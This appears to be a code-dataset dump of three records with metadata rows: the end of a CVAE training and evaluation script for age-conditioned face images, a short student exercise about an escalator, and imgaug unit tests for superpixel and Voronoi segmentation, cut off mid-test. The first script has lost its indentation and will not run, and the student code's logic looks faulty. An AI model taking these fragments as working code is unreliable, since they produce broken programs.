for i in tqdm(range(len(unique_labels_replica))):
# print((i, num_labels_replicated))
curr_label = unique_labels_replica[i]
indx_i = np.where(labels == curr_label)[0]
if len(indx_i) < max_num_img_per_label_after_replica:
num_img_less = max_num_img_per_label_after_replica - len(indx_i)
indx_replica = np.random.choice(indx_i, size = num_img_less, replace=True)
if num_labels_replicated == 0:
images_replica = images[indx_replica]
labels_replica = labels[indx_replica]
else:
images_replica = np.concatenate((images_replica, images[indx_replica]), axis=0)
labels_replica = np.concatenate((labels_replica, labels[indx_replica]))
num_labels_replicated+=1
#end for i
images = np.concatenate((images, images_replica), axis=0)
labels = np.concatenate((labels, labels_replica))
print("We replicate {} images and labels \n".format(len(images_replica)))
del images_replica, labels_replica; gc.collect()
# plot the histogram of unnormalized labels
hist_filename = wd + "/histogram_after_replica_unnormalized_age_" + str(args.img_size) + 'x' + str(args.img_size)
num_bins = len(list(set(labels)))
plt.figure()
plt.hist(labels, num_bins, facecolor='blue', density=False)
plt.savefig(hist_filename)
## normalize labels
labels = labels/args.max_label
#######################################################################################
''' CVAE training '''
#######################################################################################
start = timeit.default_timer()
print("\n Begin Training CVAE:")
Filename_CVAE = save_models_folder + '/ckpt_cvae_dimz_{}_dimc_{}_niters_{}_seed_{}.pth'.format(args.dim_z, args.dim_c, args.niters, args.seed)
print(Filename_CVAE)
save_images_in_train_folder = save_images_folder + '/images_in_train'
os.makedirs(save_images_in_train_folder, exist_ok=True)
if not os.path.isfile(Filename_CVAE):
net_encoder = CVAE_encoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_decoder = CVAE_decoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_encoder = nn.DataParallel(net_encoder)
net_decoder = nn.DataParallel(net_decoder)
# Start training
net_encoder, net_decoder, train_cvae_loss = train_cvae(images, labels, net_encoder, net_decoder, save_images_folder=save_images_in_train_folder, save_models_folder = save_models_folder)
# store model
torch.save({
'net_decoder_state_dict': net_decoder.state_dict(),
}, Filename_CVAE)
# plot training loss
loss_filename = save_models_folder + '/train_loss_cvae_dimz_{}_dimc_{}_niters_{}_seed_{}.png'.format(args.dim_z, args.dim_c, args.niters, args.seed)
PlotLoss(train_cvae_loss, loss_filename)
else:
print("Loading pre-trained generator >>>")
checkpoint = torch.load(Filename_CVAE)
net_decoder = CVAE_decoder(zdim=args.dim_z, ydim=args.dim_c).cuda()
net_decoder = nn.DataParallel(net_decoder)
net_decoder.load_state_dict(checkpoint['net_decoder_state_dict'])
def fn_sampleGAN_given_labels(labels, batch_size):
labels = labels*args.max_label
fake_images, fake_labels = sample_cvae_given_labels(net_decoder, given_labels=labels, batch_size = batch_size)
fake_labels = fake_labels / args.max_label
return fake_images, fake_labels
stop = timeit.default_timer()
print("CVAE training finished; Time elapses: {}s".format(stop - start))
#######################################################################################
''' Evaluation '''
#######################################################################################
if args.comp_FID:
#for FID
PreNetFID = encoder(dim_bottleneck=512).cuda()
PreNetFID = nn.DataParallel(PreNetFID)
Filename_PreCNNForEvalGANs = os.path.join(args.eval_ckpt_path, 'ckpt_AE_epoch_200_seed_2020_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs)
PreNetFID.load_state_dict(checkpoint_PreNet['net_encoder_state_dict'])
# Diversity: entropy of predicted races within each eval center
PreNetDiversity = ResNet34_class(num_classes=5, ngpu = torch.cuda.device_count()).cuda() #5 races
Filename_PreCNNForEvalGANs_Diversity = os.path.join(args.eval_ckpt_path, 'ckpt_PreCNNForEvalGANs_ResNet34_class_epoch_200_seed_2020_classify_5_races_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs_Diversity)
PreNetDiversity.load_state_dict(checkpoint_PreNet['net_state_dict'])
# for LS
PreNetLS = ResNet34_regre(ngpu = torch.cuda.device_count()).cuda()
Filename_PreCNNForEvalGANs_LS = os.path.join(args.eval_ckpt_path, 'ckpt_PreCNNForEvalGANs_ResNet34_regre_epoch_200_seed_2020_CVMode_False.pth')
checkpoint_PreNet = torch.load(Filename_PreCNNForEvalGANs_LS)
PreNetLS.load_state_dict(checkpoint_PreNet['net_state_dict'])
#####################
# generate nfake images
print("Start sampling {} fake images per label from GAN >>>".format(args.nfake_per_label))
eval_labels_norm = np.arange(1, args.max_label+1) / args.max_label # normalized labels for evaluation
num_eval_labels = len(eval_labels_norm)
for i in tqdm(range(num_eval_labels)):
curr_label = eval_labels_norm[i]
curr_fake_images, curr_fake_labels = fn_sampleGAN_given_labels(curr_label*np.ones([args.nfake_per_label,1]), args.samp_batch_size)
if i == 0:
fake_images = curr_fake_images
fake_labels_assigned = curr_fake_labels.reshape(-1)
else:
fake_images = np.concatenate((fake_images, curr_fake_images), axis=0)
fake_labels_assigned = np.concatenate((fake_labels_assigned, curr_fake_labels.reshape(-1)))
assert len(fake_images) == args.nfake_per_label*num_eval_labels
assert len(fake_labels_assigned) == args.nfake_per_label*num_eval_labels
## dump fake images for evaluation: NIQE
if args.dump_fake_for_NIQE:
print("\n Dumping fake images for NIQE...")
dump_fake_images_folder = save_images_folder + '/fake_images_for_NIQE_nfake_{}'.format(len(fake_images))
os.makedirs(dump_fake_images_folder, exist_ok=True)
for i in tqdm(range(len(fake_images))):
label_i = int(fake_labels_assigned[i]*args.max_label)
filename_i = dump_fake_images_folder + "/{}_{}.png".format(i, label_i)
os.makedirs(os.path.dirname(filename_i), exist_ok=True)
image_i = fake_images[i]
# image_i = ((image_i*0.5+0.5)*255.0).astype(np.uint8)
image_i_pil = Image.fromarray(image_i.transpose(1,2,0))
image_i_pil.save(filename_i)
#end for i
print("End sampling!")
print("\n We got {} fake images.".format(len(fake_images)))
#####################
# normalize images and labels
real_images = (raw_images/255.0-0.5)/0.5
real_labels = raw_labels/args.max_label
nfake_all = len(fake_images)
nreal_all = len(real_images)
fake_images = (fake_images/255.0-0.5)/0.5
#####################
# Evaluate FID within a sliding window with a radius R on the label's range (i.e., [1,max_label]). The center of the sliding window locate on [R+1,2,3,...,max_label-R].
center_start = 1+args.FID_radius
center_stop = args.max_label-args.FID_radius
centers_loc = np.arange(center_start, center_stop+1)
FID_over_centers = np.zeros(len(centers_loc))
entropies_over_centers = np.zeros(len(centers_loc)) # entropy at each center
labelscores_over_centers = np.zeros(len(centers_loc)) #label score at each center
num_realimgs_over_centers = np.zeros(len(centers_loc))
for i in range(len(centers_loc)):
center = centers_loc[i]
interval_start = (center - args.FID_radius)/args.max_label
interval_stop = (center + args.FID_radius)/args.max_label
indx_real = np.where((real_labels>=interval_start)*(real_labels<=interval_stop)==True)[0]
np.random.shuffle(indx_real)
real_images_curr = real_images[indx_real]
num_realimgs_over_centers[i] = len(real_images_curr)
indx_fake = np.where((fake_labels_assigned>=interval_start)*(fake_labels_assigned<=interval_stop)==True)[0]
np.random.shuffle(indx_fake)
fake_images_curr = fake_images[indx_fake]
fake_labels_assigned_curr = fake_labels_assigned[indx_fake]
# FID
FID_over_centers[i] = cal_FID(PreNetFID, real_images_curr, fake_images_curr, batch_size = 500, resize = None)
# Entropy of predicted class labels
predicted_class_labels = predict_class_labels(PreNetDiversity, fake_images_curr, batch_size=500, num_workers=args.num_workers)
entropies_over_centers[i] = compute_entropy(predicted_class_labels)
# Label score
labelscores_over_centers[i], _ = cal_labelscore(PreNetLS, fake_images_curr, fake_labels_assigned_curr, min_label_before_shift=0, max_label_after_shift=args.max_label, batch_size = 500, resize = None, num_workers=args.num_workers)
print("\r Center:{}; Real:{}; Fake:{}; FID:{}; LS:{}; ET:{}.".format(center, len(real_images_curr), len(fake_images_curr), FID_over_centers[i], labelscores_over_centers[i], entropies_over_centers[i]))
# average over all centers
print("\n CVAE SFID: {}({}); min/max: {}/{}.".format(np.mean(FID_over_centers), np.std(FID_over_centers), np.min(FID_over_centers), np.max(FID_over_centers)))
print("\n CVAE LS over centers: {}({}); min/max: {}/{}.".format(np.mean(labelscores_over_centers), np.std(labelscores_over_centers), np.min(labelscores_over_centers), np.max(labelscores_over_centers)))
print("\n CVAE entropy over centers: {}({}); min/max: {}/{}.".format(np.mean(entropies_over_centers), np.std(entropies_over_centers), np.min(entropies_over_centers), np.max(entropies_over_centers)))
# dump FID versus number of samples (for each center) to npy
dump_fid_ls_entropy_over_centers_filename = os.path.join(path_to_output, 'fid_ls_entropy_over_centers')
np.savez(dump_fid_ls_entropy_over_centers_filename, fids=FID_over_centers, labelscores=labelscores_over_centers, entropies=entropies_over_centers, nrealimgs=num_realimgs_over_centers, centers=centers_loc)
#####################
# FID: Evaluate FID on all fake images
indx_shuffle_real = np.arange(nreal_all); np.random.shuffle(indx_shuffle_real)
indx_shuffle_fake = np.arange(nfake_all); np.random.shuffle(indx_shuffle_fake)
FID = cal_FID(PreNetFID, real_images[indx_shuffle_real], fake_images[indx_shuffle_fake], batch_size = 500, resize = None)
print("\n CVAE: FID of {} fake images: {}.".format(nfake_all, FID))
#####################
# Overall LS: abs(y_assigned - y_predicted)
ls_mean_overall, ls_std_overall = cal_labelscore(PreNetLS, fake_images, fake_labels_assigned, min_label_before_shift=0, max_label_after_shift=args.max_label, batch_size = 500, resize = None, num_workers=args.num_workers)
print("\n CVAE: overall LS of {} fake images: {}({}).".format(nfake_all, ls_mean_overall, ls_std_overall))
#####################
# Dump evaluation results
eval_results_logging_fullpath = os.path.join(path_to_output, 'eval_results.txt')
if not os.path.isfile(eval_results_logging_fullpath):
eval_results_logging_file = open(eval_results_logging_fullpath, "w")
eval_results_logging_file.close()
with open(eval_results_logging_fullpath, 'a') as eval_results_logging_file:
eval_results_logging_file.write("\n===================================================================================================")
eval_results_logging_file.write("\n Radius: {}; # Centers: {}. \n".format(args.FID_radius, args.FID_num_centers))
print(args, file=eval_results_logging_file)
eval_results_logging_file.write("\n SFID: {}({}).".format(np.mean(FID_over_centers), np.std(FID_over_centers)))
eval_results_logging_file.write("\n LS: {}({}).".format(np.mean(labelscores_over_centers), np.std(labelscores_over_centers)))
eval_results_logging_file.write("\n Diversity: {}({}).".format(np.mean(entropies_over_centers), np.std(entropies_over_centers)))
#######################################################################################
''' Visualize fake images of the trained GAN '''
#######################################################################################
if args.visualize_fake_images:
# First, visualize conditional generation; vertical grid
## 10 rows; 3 columns (3 samples for each age)
n_row = 10
n_col = 3
displayed_labels = (np.linspace(0.05, 0.95, n_row)*args.max_label).astype(np.int)
# displayed_labels = np.array([3,9,15,21,27,33,39,45,51,57])
# displayed_labels = np.array([4,10,16,22,28,34,40,46,52,58])
displayed_normalized_labels = displayed_labels/args.max_label
### output fake images from a trained GAN
filename_fake_images = os.path.join(save_images_folder, 'fake_images_grid_{}x{}.png').format(n_row, n_col)
fake_labels_assigned = []
for tmp_i in range(len(displayed_normalized_labels)):
curr_label = displayed_normalized_labels[tmp_i]
fake_labels_assigned.append(np.ones(shape=[n_col, 1])*curr_label)
fake_labels_assigned = np.concatenate(fake_labels_assigned, axis=0)
images_show, _ = fn_sampleGAN_given_labels(fake_labels_assigned, args.samp_batch_size)
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, filename_fake_images, nrow=n_col, normalize=True)
#----------------------------------------------------------------
### output some real images as baseline
filename_real_images = save_images_folder + '/real_images_grid_{}x{}.png'.format(n_row, n_col)
if not os.path.isfile(filename_real_images):
images_show = np.zeros((n_row*n_col, args.num_channels, args.img_size, args.img_size))
for i_row in range(n_row):
curr_label = displayed_labels[i_row]
for j_col in range(n_col):
indx_curr_label = np.where(raw_labels==curr_label)[0]
np.random.shuffle(indx_curr_label)
indx_curr_label = indx_curr_label[0]
images_show[i_row*n_col+j_col] = raw_images[indx_curr_label]
images_show = (images_show/255.0-0.5)/0.5
images_show = torch.from_numpy(images_show)
save_image(images_show.data, filename_real_images, nrow=n_col, normalize=True)
print("\n===================================================================================================")
| [
"dingx92@gmail.com"
] | dingx92@gmail.com |
ac340560aaff7c0d0112525dfb2bca7378791bdc | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/183/usersdata/355/107995/submittedfiles/escadarolante.py | 1a3884391c6b48bee70782f254cce1adf18dbe87 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | # -*- coding: utf-8 -*-
npessoas=int(input('Digite o número de pessoas detectadas pelo sensor: '))
soma=0
soma2=0
instante=0
for i in range(0,npessoas,1):
soma=instante-soma
soma2=soma2+soma
instante=float(input('Digite o instante em que a pessoa foi detectada: '))
print(soma2+10) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
42108bf9661896196414e28494cfdb5886d78a41 | 46b4220d668e07215c2b2ec7255edc31d51edb15 | /test/augmenters/test_segmentation.py | eb4755aa9d357ceb3f92691263a0388e517f29c9 | [
"MIT"
] | permissive | alisure-fork/imgaug | f5f848a65570785fd1a256f245fb47a975574daa | 037abbd0d9f8dd8949c10858bf4aa2f7762c6add | refs/heads/master | 2020-07-24T14:34:23.356424 | 2019-09-20T09:24:41 | 2019-09-20T09:24:41 | 207,956,502 | 0 | 0 | MIT | 2019-09-12T03:26:17 | 2019-09-12T03:26:15 | null | UTF-8 | Python | false | false | 51,650 | py | from __future__ import print_function, division, absolute_import
import sys
import warnings
# unittest only added in 3.4 self.subTest()
if sys.version_info[0] < 3 or sys.version_info[1] < 4:
import unittest2 as unittest
else:
import unittest
# unittest.mock is not available in 2.7 (though unittest2 might contain it?)
try:
import unittest.mock as mock
except ImportError:
import mock
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
from imgaug import augmenters as iaa
from imgaug import parameters as iap
from imgaug import dtypes as iadt
from imgaug import random as iarandom
from imgaug.testutils import reseed
class TestSuperpixels(unittest.TestCase):
def setUp(self):
reseed()
@classmethod
def _array_equals_tolerant(cls, a, b, tolerance):
# TODO isnt this just np.allclose(a, b, rtol=0, atol=tolerance) ?!
diff = np.abs(a.astype(np.int32) - b.astype(np.int32))
return np.all(diff <= tolerance)
@property
def base_img(self):
base_img = [
[255, 255, 255, 0, 0, 0],
[255, 235, 255, 0, 20, 0],
[250, 250, 250, 5, 5, 5]
]
base_img = np.tile(
np.array(base_img, dtype=np.uint8)[..., np.newaxis],
(1, 1, 3))
return base_img
@property
def base_img_superpixels(self):
base_img_superpixels = [
[251, 251, 251, 4, 4, 4],
[251, 251, 251, 4, 4, 4],
[251, 251, 251, 4, 4, 4]
]
base_img_superpixels = np.tile(
np.array(base_img_superpixels, dtype=np.uint8)[..., np.newaxis],
(1, 1, 3))
return base_img_superpixels
@property
def base_img_superpixels_left(self):
base_img_superpixels_left = self.base_img_superpixels
base_img_superpixels_left[:, 3:, :] = self.base_img[:, 3:, :]
return base_img_superpixels_left
@property
def base_img_superpixels_right(self):
base_img_superpixels_right = self.base_img_superpixels
base_img_superpixels_right[:, :3, :] = self.base_img[:, :3, :]
return base_img_superpixels_right
def test_p_replace_0_n_segments_2(self):
aug = iaa.Superpixels(p_replace=0, n_segments=2)
observed = aug.augment_image(self.base_img)
expected = self.base_img
assert np.allclose(observed, expected)
def test_p_replace_1_n_segments_2(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
observed = aug.augment_image(self.base_img)
expected = self.base_img_superpixels
assert self._array_equals_tolerant(observed, expected, 2)
def test_p_replace_1_n_segments_stochastic_parameter(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=iap.Deterministic(2))
observed = aug.augment_image(self.base_img)
expected = self.base_img_superpixels
assert self._array_equals_tolerant(observed, expected, 2)
def test_p_replace_stochastic_parameter_n_segments_2(self):
aug = iaa.Superpixels(
p_replace=iap.Binomial(iap.Choice([0.0, 1.0])), n_segments=2)
observed = aug.augment_image(self.base_img)
assert (
np.allclose(observed, self.base_img)
or self._array_equals_tolerant(
observed, self.base_img_superpixels, 2)
)
def test_p_replace_050_n_segments_2(self):
aug = iaa.Superpixels(p_replace=0.5, n_segments=2)
seen = {"none": False, "left": False, "right": False, "both": False}
for _ in sm.xrange(100):
observed = aug.augment_image(self.base_img)
if self._array_equals_tolerant(observed, self.base_img, 2):
seen["none"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels_left, 2):
seen["left"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels_right, 2):
seen["right"] = True
elif self._array_equals_tolerant(
observed, self.base_img_superpixels, 2):
seen["both"] = True
else:
raise Exception(
"Generated superpixels image does not match any "
"expected image.")
if np.all(seen.values()):
break
assert np.all(seen.values())
def test_failure_on_invalid_datatype_for_p_replace(self):
# note that assertRaisesRegex does not exist in 2.7
got_exception = False
try:
_ = iaa.Superpixels(p_replace="test", n_segments=100)
except Exception as exc:
assert "Expected " in str(exc)
got_exception = True
assert got_exception
def test_failure_on_invalid_datatype_for_n_segments(self):
# note that assertRaisesRegex does not exist in 2.7
got_exception = False
try:
_ = iaa.Superpixels(p_replace=1, n_segments="test")
except Exception as exc:
assert "Expected " in str(exc)
got_exception = True
assert got_exception
def test_get_parameters(self):
aug = iaa.Superpixels(
p_replace=0.5, n_segments=2, max_size=100, interpolation="nearest")
params = aug.get_parameters()
assert isinstance(params[0], iap.Binomial)
assert isinstance(params[0].p, iap.Deterministic)
assert isinstance(params[1], iap.Deterministic)
assert 0.5 - 1e-4 < params[0].p.value < 0.5 + 1e-4
assert params[1].value == 2
assert params[2] == 100
assert params[3] == "nearest"
def test_other_dtypes_bool(self):
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[False, False, True, True],
[False, False, True, True]
], dtype=bool)
img_aug = aug.augment_image(img)
assert img_aug.dtype == img.dtype
assert np.all(img_aug == img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[True, True, True, True],
[False, True, True, True]
], dtype=bool)
img_aug = aug.augment_image(img)
assert img_aug.dtype == img.dtype
assert np.all(img_aug)
def test_other_dtypes_uint_int(self):
for dtype in [np.uint8, np.uint16, np.uint32,
np.int8, np.int16, np.int32]:
min_value, center_value, max_value = \
iadt.get_value_range_of_dtype(dtype)
if np.dtype(dtype).kind == "i":
values = [int(center_value), int(0.1 * max_value),
int(0.2 * max_value), int(0.5 * max_value),
max_value-100]
values = [((-1)*value, value) for value in values]
else:
values = [(0, int(center_value)),
(10, int(0.1 * max_value)),
(10, int(0.2 * max_value)),
(10, int(0.5 * max_value)),
(0, max_value),
(int(center_value),
max_value)]
for v1, v2 in values:
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[v1, v1, v2, v2],
[v1, v1, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert np.array_equal(img_aug, img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[v2, v2, v2, v2],
[v1, v2, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert np.all(img_aug == int(np.round((7/8)*v2 + (1/8)*v1)))
def test_other_dtypes_float(self):
# currently, no float dtype is actually accepted
for dtype in []:
def _allclose(a, b):
atol = 1e-4 if dtype == np.float16 else 1e-8
return np.allclose(a, b, atol=atol, rtol=0)
isize = np.dtype(dtype).itemsize
for value in [0, 1.0, 10.0, 1000 ** (isize - 1)]:
v1 = (-1) * value
v2 = value
aug = iaa.Superpixels(p_replace=1.0, n_segments=2)
img = np.array([
[v1, v1, v2, v2],
[v1, v1, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert _allclose(img_aug, img)
aug = iaa.Superpixels(p_replace=1.0, n_segments=1)
img = np.array([
[v2, v2, v2, v2],
[v1, v2, v2, v2]
], dtype=dtype)
img_aug = aug.augment_image(img)
assert img_aug.dtype == np.dtype(dtype)
assert _allclose(img_aug, (7/8)*v2 + (1/8)*v1)
class Test_segment_voronoi(unittest.TestCase):
def setUp(self):
reseed()
def test_cell_coordinates_is_empty_integrationtest(self):
image = np.arange(2*2*3).astype(np.uint8).reshape((2, 2, 3))
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image, image_seg)
@classmethod
def _test_image_n_channels_integrationtest(cls, nb_channels):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
if nb_channels is not None:
image = np.tile(image[:, :, np.newaxis], (1, 1, nb_channels))
for c in sm.xrange(nb_channels):
image[..., c] += c
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels1 = image[0:2, 0:2]
pixels2 = image[0:2, 2:4]
avg_color1 = np.average(pixels1.astype(np.float32), axis=(0, 1))
avg_color2 = np.average(pixels2.astype(np.float32), axis=(0, 1))
image_expected = np.uint8([
[avg_color1, avg_color1, avg_color2, avg_color2],
[avg_color1, avg_color1, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_image_has_no_channels_integrationtest(self):
self._test_image_n_channels_integrationtest(None)
def test_image_has_one_channel_integrationtest(self):
self._test_image_n_channels_integrationtest(1)
def test_image_has_three_channels_integrationtest(self):
self._test_image_n_channels_integrationtest(3)
def test_replace_mask_is_all_false_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([False, False], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_replace_mask_is_mixed_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([False, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels2 = image[0:2, 2:4]
avg_color2 = np.sum(pixels2).astype(np.float32) / pixels2.size
image_expected = np.uint8([
[0, 1, avg_color2, avg_color2],
[2, 3, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_replace_mask_is_none_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = None
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
pixels1 = image[0:2, 0:2]
pixels2 = image[0:2, 2:4]
avg_color1 = np.sum(pixels1).astype(np.float32) / pixels1.size
avg_color2 = np.sum(pixels2).astype(np.float32) / pixels2.size
image_expected = np.uint8([
[avg_color1, avg_color1, avg_color2, avg_color2],
[avg_color1, avg_color1, avg_color2, avg_color2],
])
assert np.array_equal(image_seg, image_expected)
def test_no_cell_coordinates_provided_and_no_channel_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_no_cell_coordinates_provided_and_3_channels_integrationtest(self):
image = np.uint8([
[0, 1, 200, 201],
[2, 3, 202, 203]
])
image = np.tile(image[..., np.newaxis], (1, 1, 3))
cell_coordinates = np.zeros((0, 2), dtype=np.float32)
replace_mask = np.zeros((0,), dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_height(self):
image = np.zeros((0, 4, 3), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_width(self):
image = np.zeros((4, 0, 3), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
def test_image_with_zero_size(self):
image = np.zeros((0, 0), dtype=np.uint8)
cell_coordinates = np.float32([
[1.0, 1.0],
[3.0, 1.0]
])
replace_mask = np.array([True, True], dtype=bool)
image_seg = iaa.segment_voronoi(image, cell_coordinates, replace_mask)
assert np.array_equal(image_seg, image)
class TestVoronoi(unittest.TestCase):
    """Tests for the ``Voronoi`` augmenter.

    Several tests patch ``imgaug.imresize_single_image`` or
    ``imgaug.augmenters.segmentation.segment_voronoi`` with mocks and then
    inspect exact call counts and argument lists, so the statement order
    inside each test is significant.
    """
    def setUp(self):
        # reset the global random state so tests are reproducible
        reseed()
    def test___init___defaults(self):
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler)
        # defaults: p_replace=1 (deterministic), max_size=128, linear interp.
        assert aug.points_sampler is sampler
        assert isinstance(aug.p_replace, iap.Deterministic)
        assert aug.p_replace.value == 1
        assert aug.max_size == 128
        assert aug.interpolation == "linear"
    def test___init___custom_arguments(self):
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, p_replace=0.5, max_size=None,
                          interpolation="cubic")
        assert aug.points_sampler is sampler
        # a float p_replace is wrapped in a Binomial parameter
        assert isinstance(aug.p_replace, iap.Binomial)
        assert np.isclose(aug.p_replace.p.value, 0.5)
        assert aug.max_size is None
        assert aug.interpolation == "cubic"
    def test_max_size_is_none(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, max_size=None)
        mock_imresize = mock.MagicMock()
        mock_imresize.return_value = image
        fname = "imgaug.imresize_single_image"
        with mock.patch(fname, mock_imresize):
            _image_aug = aug(image=image)
        # max_size=None disables downscaling entirely
        assert mock_imresize.call_count == 0
    def test_max_size_is_int_image_not_too_large(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, max_size=100)
        mock_imresize = mock.MagicMock()
        mock_imresize.return_value = image
        fname = "imgaug.imresize_single_image"
        with mock.patch(fname, mock_imresize):
            _image_aug = aug(image=image)
        # longer image side (20) is below max_size=100 -> no resize call
        assert mock_imresize.call_count == 0
    def test_max_size_is_int_image_too_large(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, max_size=10)
        mock_imresize = mock.MagicMock()
        mock_imresize.return_value = image
        fname = "imgaug.imresize_single_image"
        with mock.patch(fname, mock_imresize):
            _image_aug = aug(image=image)
        assert mock_imresize.call_count == 1
        # 10x20 scaled so that the longer side matches max_size=10 -> (5, 10)
        assert mock_imresize.call_args_list[0][0][1] == (5, 10)
    def test_interpolation(self):
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler, max_size=10, interpolation="cubic")
        mock_imresize = mock.MagicMock()
        mock_imresize.return_value = image
        fname = "imgaug.imresize_single_image"
        with mock.patch(fname, mock_imresize):
            _image_aug = aug(image=image)
        assert mock_imresize.call_count == 1
        # the interpolation argument must be forwarded to the resize call
        assert mock_imresize.call_args_list[0][1]["interpolation"] == "cubic"
    def test_point_sampler_called(self):
        # wrapper sampler that counts how often it is queried
        class LoggedPointSampler(iaa.PointsSamplerIf):
            def __init__(self, other):
                self.other = other
                self.call_count = 0
            def sample_points(self, images, random_state):
                self.call_count += 1
                return self.other.sample_points(images, random_state)
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = LoggedPointSampler(iaa.RegularGridPointsSampler(1, 1))
        aug = iaa.Voronoi(sampler)
        _image_aug = aug(image=image)
        assert sampler.call_count == 1
    def test_point_sampler_returns_no_points_integrationtest(self):
        # a sampler producing zero points must leave the image unchanged
        class NoPointsPointSampler(iaa.PointsSamplerIf):
            def sample_points(self, images, random_state):
                return [np.zeros((0, 2), dtype=np.float32)]
        image = np.zeros((10, 20, 3), dtype=np.uint8)
        sampler = NoPointsPointSampler()
        aug = iaa.Voronoi(sampler)
        image_aug = aug(image=image)
        assert np.array_equal(image_aug, image)
    @classmethod
    def _test_image_with_n_channels(cls, nb_channels):
        # shared helper: the augmented image must keep the input's shape,
        # for nb_channels in {None, 1, 3}
        image = np.zeros((10, 20), dtype=np.uint8)
        if nb_channels is not None:
            image = image[..., np.newaxis]
            image = np.tile(image, (1, 1, nb_channels))
        sampler = iaa.RegularGridPointsSampler(1, 1)
        aug = iaa.Voronoi(sampler)
        mock_segment_voronoi = mock.MagicMock()
        if nb_channels is None:
            # channel-less input is expected to reach segment_voronoi()
            # as (H, W, 1) and be squeezed back afterwards
            mock_segment_voronoi.return_value = image[..., np.newaxis]
        else:
            mock_segment_voronoi.return_value = image
        fname = "imgaug.augmenters.segmentation.segment_voronoi"
        with mock.patch(fname, mock_segment_voronoi):
            image_aug = aug(image=image)
        assert image_aug.shape == image.shape
    def test_image_with_no_channels(self):
        self._test_image_with_n_channels(None)
    def test_image_with_one_channel(self):
        self._test_image_with_n_channels(1)
    def test_image_with_three_channels(self):
        self._test_image_with_n_channels(3)
    def test_p_replace_is_zero(self):
        image = np.zeros((50, 50), dtype=np.uint8)
